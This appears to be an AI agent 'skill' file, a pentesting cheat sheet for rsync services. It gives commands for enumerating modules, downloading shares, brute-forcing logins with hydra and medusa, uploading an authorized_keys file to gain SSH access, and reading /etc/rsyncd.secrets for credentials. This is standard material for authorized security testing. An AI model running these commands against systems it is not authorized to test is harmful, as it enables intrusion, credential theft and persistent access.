Rsync Pentesting Skill

A skill for pentesting rsync file sharing services (default port 873).

Quick Start

# Enumerate rsync modules
nmap -sV --script "rsync-list-modules" -p 873 <TARGET_IP>

# Manual enumeration via netcat
nc -vn <TARGET_IP> 873

Enumeration

Banner Grabbing

Connect to the rsync service to get version information:

nc -vn <TARGET_IP> 873

The server responds with

@RSYNCD: <version>

. Send the same version back, then request

#list

to retrieve available modules.

Example interaction:

@RSYNCD: 31.0        # Server sends version
@RSYNCD: 31.0        # You send same version back
#list                # Request module list
raidroot             # Module 1
USBCopy              # Module 2
_NAS_Recycle_TOSRAID # Module 3
@RSYNCD: EXIT        # Server closes connection

Module Enumeration

Use these methods to discover available rsync modules:

# Using nmap
nmap -sV --script "rsync-list-modules" -p 873 <TARGET_IP>

# Using rsync directly
rsync -av --list-only rsync://<TARGET_IP>:873

# IPv6 with alternate port
rsync -av --list-only rsync://[<IPv6>]:8730

# Metasploit module
msf> use auxiliary/scanner/rsync/modules_list

Testing Authentication

Check if modules require authentication:

# Try accessing a module
rsync -av --list-only rsync://<TARGET_IP>/<module_name>

If authentication is required, you'll see:

@RSYNCD: AUTHREQD <token>

Accessing Shared Modules

Without Authentication

# List contents
rsync -av --list-only rsync://<TARGET_IP>/<module_name>

# Download files (recursive, preserves attributes)
rsync -av rsync://<TARGET_IP>/<module_name> ./local_dir/

# Download with alternate port
rsync -av rsync://<TARGET_IP>:8730/<module_name> ./local_dir/

With Authentication

# List with credentials (prompts for password)
rsync -av --list-only rsync://<username>@<TARGET_IP>/<module_name>

# Download with credentials
rsync -av rsync://<username>@<TARGET_IP>/<module_name> ./local_dir/

Uploading Files

# Upload to remote module
rsync -av ./local_file rsync://<username>@<TARGET_IP>/<module_name>/

# Upload SSH authorized_keys for access
rsync -av home_user/.ssh/ rsync://<username>@<TARGET_IP>/home_user/.ssh

Brute Force Attacks

If modules require authentication, attempt credential cracking:

# Using hydra
hydra -l <username> -P /path/to/wordlist <TARGET_IP> rsync

# Using medusa
medusa -h <TARGET_IP> -u <username> -P /path/to/wordlist -M rsync

Post-Exploitation

Finding Configuration Files

Once you have system access, locate rsync configuration:

# Find rsyncd configuration
find /etc -name "rsyncd.conf" -o -name "rsyncd.secrets"

# Check for credentials in secrets file
cat /etc/rsyncd.secrets

The secrets file contains usernames and passwords for rsyncd authentication.

Common Configuration Locations

• /etc/rsyncd.conf

  - Main configuration file

• /etc/rsyncd.secrets

  - Authentication credentials

• /etc/rsyncd.chroot

  - Chroot settings

Attack Patterns

Pattern 1: Anonymous Access Discovery

1. Enumerate modules with

   nmap -sV --script "rsync-list-modules"

2. Test each module for anonymous access
3. Download accessible files
4. Look for sensitive data, credentials, or backup files

Pattern 2: Credential Harvesting

1. Find modules requiring authentication
2. Attempt brute force with common credentials
3. Use discovered credentials to access other services
4. Check for password reuse across systems

Pattern 3: SSH Key Upload

1. Find writable rsync module
2. Upload

   authorized_keys

   file
3. Gain SSH access to the system

Tips

• Some modules may be hidden and not appear in the list
• "Access Denied" messages indicate credential requirements
• Use

  rsync -av

  for recursive transfers with attribute preservation
• Consider using SSH tunneling for encrypted rsync transfers
• Check for path traversal vulnerabilities in module configurations

References

• Rsync Documentation
• Nmap Rsync Scripts
• Pentesting Rsync